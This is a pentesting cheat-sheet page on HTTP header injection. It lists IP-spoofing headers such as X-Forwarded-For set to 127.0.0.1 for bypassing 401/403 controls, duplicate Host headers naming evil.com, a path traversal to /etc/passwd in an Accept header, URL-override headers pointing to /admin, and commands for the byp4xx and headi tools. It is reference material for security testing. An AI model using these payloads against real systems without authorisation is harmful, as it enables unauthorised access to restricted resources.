Pentest Book
Search…
Header injections

Headers

1
# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
2
Client-IP:
3
Connection:
4
Contact:
5
Forwarded:
6
From:
7
Host:
8
Origin:
9
Referer:
10
True-Client-IP:
11
X-Client-IP:
12
X-Custom-IP-Authorization:
13
X-Forward-For:
14
X-Forwarded-For:
15
X-Forwarded-Host:
16
X-Forwarded-Server:
17
X-Host:
18
X-Original-URL:
19
X-Originating-IP:
20
X-Real-IP:
21
X-Remote-Addr:
22
X-Remote-IP:
23
X-Rewrite-URL:
24
X-Wap-Profile:
25
26
# Try to repeat same Host header 2 times
27
Host: legit.com
28
Stuff: stuff
29
Host: evil.com
30
31
# Bypass type limit
32
Accept: application/json, text/javascript, */*; q=0.01
33
Accept: ../../../../../../../../../etc/passwd{{'
34
35
# Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
36
37
# 401/403 bypasses
38
# Whitelisted IP 127.0.0.1 or localhost
39
Client-IP: 127.0.0.1
40
Forwarded-For-Ip: 127.0.0.1
41
Forwarded-For: 127.0.0.1
42
Forwarded-For: localhost
43
Forwarded: 127.0.0.1
44
Forwarded: localhost
45
True-Client-IP: 127.0.0.1
46
X-Client-IP: 127.0.0.1
47
X-Custom-IP-Authorization: 127.0.0.1
48
X-Forward-For: 127.0.0.1
49
X-Forward: 127.0.0.1
50
X-Forward: localhost
51
X-Forwarded-By: 127.0.0.1
52
X-Forwarded-By: localhost
53
X-Forwarded-For-Original: 127.0.0.1
54
X-Forwarded-For-Original: localhost
55
X-Forwarded-For: 127.0.0.1
56
X-Forwarded-For: localhost
57
X-Forwarded-Server: 127.0.0.1
58
X-Forwarded-Server: localhost
59
X-Forwarded: 127.0.0.1
60
X-Forwarded: localhost
61
X-Forwared-Host: 127.0.0.1
62
X-Forwared-Host: localhost
63
X-Host: 127.0.0.1
64
X-Host: localhost
65
X-HTTP-Host-Override: 127.0.0.1
66
X-Originating-IP: 127.0.0.1
67
X-Real-IP: 127.0.0.1
68
X-Remote-Addr: 127.0.0.1
69
X-Remote-Addr: localhost
70
X-Remote-IP: 127.0.0.1
71
72
# Fake Origin - make GET request to accesible endpoint with:
73
X-Original-URL: /admin
74
X-Override-URL: /admin
75
X-Rewrite-URL: /admin
76
Referer: /admin
77
# Also try with absoulte url https:/domain.com/admin
78
79
# Method Override
80
X-HTTP-Method-Override: PUT
81
82
# Provide full path GET
83
GET https://vulnerable-website.com/ HTTP/1.1
84
Host: evil-website.com
85
86
# Add line wrapping
87
GET /index.php HTTP/1.1
88
Host: vulnerable-website.com
89
Host: evil-website.com
90
91
# Wordlists
92
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
93
https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers
Copied!

Tools

1
# https://github.com/lobuhi/byp4xx
2
./byp4xx.sh https://url/path
3
# https://github.com/OdinF13/Bug-Bounty-Scripts
4
5
# https://github.com/mlcsec/headi
6
headi -url http://target.com/admin
Copied!
Last modified 9mo ago
Export as PDF
Copy link
Contents
Headers
Tools